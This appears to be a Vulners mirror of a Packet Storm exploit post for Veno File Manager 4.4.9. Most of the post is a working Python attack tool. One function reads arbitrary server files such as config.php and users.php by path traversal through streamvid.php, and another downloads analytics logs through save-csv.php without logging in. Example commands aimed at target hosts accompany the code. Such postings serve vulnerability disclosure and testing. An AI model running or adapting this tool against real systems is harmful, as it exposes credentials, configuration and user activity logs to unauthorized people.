Lucene search
K

📄 Veno File Manager 4.4.9 Arbitrary File Read / Log Disclosure

🗓️ 19 Jun 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 34 Views

Exploit tool for Veno File Manager 4.4.9 showing authenticated file disclosure and unauthenticated log access.

Code
==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 - Exploit Tool                                                                           |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This script is an exploit tool for Veno File Manager 4.4.9 that demonstrates two security issues:
                     Authenticated file disclosure: uses superadmin cookies to read arbitrary server files.
                     Unauthenticated log access: downloads system logs without needing login.
                     It sends HTTP requests to vulnerable endpoints, extracts sensitive data, and can save logs locally for analysis.
    
    [+] POc        :  
    
    #!/usr/bin/env python3
    
    import requests
    import base64
    import sys
    import argparse
    from urllib.parse import urljoin
    
    class VFMExploit:
        def __init__(self, target_url):
            self.target_url = target_url.rstrip('/')
            self.session = requests.Session()
        def disclose_file_authenticated(self, cookie_name, cookie_value, file_path):
            """
            Vulnerability 1: Arbitrary File Disclosure (Requires superadmin privileges)
            """
            print(f"[*] Attempting to read file: {file_path}")
            cookies = {cookie_name: cookie_value}
            print("[*] Step 1: Changing initial directory to ./")
            post_url = urljoin(self.target_url, "/vfm-admin/index.php")
            response = self.session.post(
                post_url,
                cookies=cookies,
                data={"starting_dir": "./"},
                verify=False
            )
            print(f"[*] Step 2: Reading file via streamvid.php")
            encoded_path = base64.b64encode(file_path.encode()).decode()
            get_url = urljoin(self.target_url, f"/vfm-admin/ajax/streamvid.php?vid={encoded_path}")
            response = self.session.get(get_url, cookies=cookies, verify=False)
            if response.status_code == 200:
                print("[✓] File extracted successfully!")
                print("="*50)
                print(response.text)
                print("="*50)
                return response.text
            else:
                print(f"[✗] Extraction failed. Status code: {response.status_code}")
                return None
        def download_logs_unauthenticated(self, start_date):
            """
            Vulnerability 2: Unauthenticated Log Download
            """
            print(f"[*] Attempting to download logs since date: {start_date}")
            post_url = urljoin(self.target_url, "/vfm-admin/admin-panel/view/analytics/save-csv.php")
            data = {
                "logsince": start_date,
                "loguntil": "3000-12-31"
            }
            try:
                response = self.session.post(post_url, data=data, verify=False, timeout=30)
                if response.status_code == 200 and len(response.text) > 0:
                    print(f"[✓] Logs downloaded successfully! ({len(response.text)} bytes)")
                    print("="*50)
                    print(response.text[:2000])  # Display the first 2000 characters only
                    if len(response.text) > 2000:
                        print(f"\n... and {len(response.text)-2000} more characters remaining")
                    print("="*50)
                    filename = f"logs_{start_date}.csv"
                    with open(filename, 'w', encoding='utf-8') as f:
                        f.write(response.text)
                    print(f"[*] Logs saved to file: {filename}")
                    return response.text
                else:
                    print(f"[✗] No logs found or download failed")
                    return None
            except Exception as e:
                print(f"[✗] Error: {e}")
                return None
        def exploit_all(self, cookie_name=None, cookie_value=None, file_path=None, start_date=None):
            """
            Execute all possible exploit checks
            """
            print("="*60)
            print("Veno File Manager 4.4.9 - Multi Exploit Tool")
            print("="*60)
            results = {}
            if cookie_name and cookie_value and file_path:
                print("\n[+] Executing Exploit 1: File Disclosure")
                results['file_disclosure'] = self.disclose_file_authenticated(
                    cookie_name, cookie_value, file_path
                )
            if start_date:
                print("\n[+] Executing Exploit 2: Log Download")
                results['logs_download'] = self.download_logs_unauthenticated(start_date)
            return results
    def main():
        parser = argparse.ArgumentParser(
            description='Veno File Manager 4.4.9 - Exploit Tool',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file vfm-admin/_content/users/users.php
      python exploit.py -u http://target.com/vfm --logs 2024-01-01
      python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file ../../config.php --logs 2024-01-01
            """
        )
        parser.add_argument('-u', '--url', required=True, help='Application path (e.g., http://target.com/vfm)')
        parser.add_argument('-c', '--cookie-name', help='Session cookie name for authentication')
        parser.add_argument('-v', '--cookie-value', help='Session cookie value for authentication')
        parser.add_argument('-f', '--file', help='Path of the file to read (e.g., ../../config.php)')
        parser.add_argument('-l', '--logs', help='Download logs starting from date (yyyy-mm-dd)')
        args = parser.parse_args()
        import urllib3
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        exploit = VFMExploit(args.url)
        exploit.exploit_all(
            cookie_name=args.cookie_name,
            cookie_value=args.cookie_value,
            file_path=args.file,
            start_date=args.logs
        )
    
    if __name__ == "__main__":
        main()
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation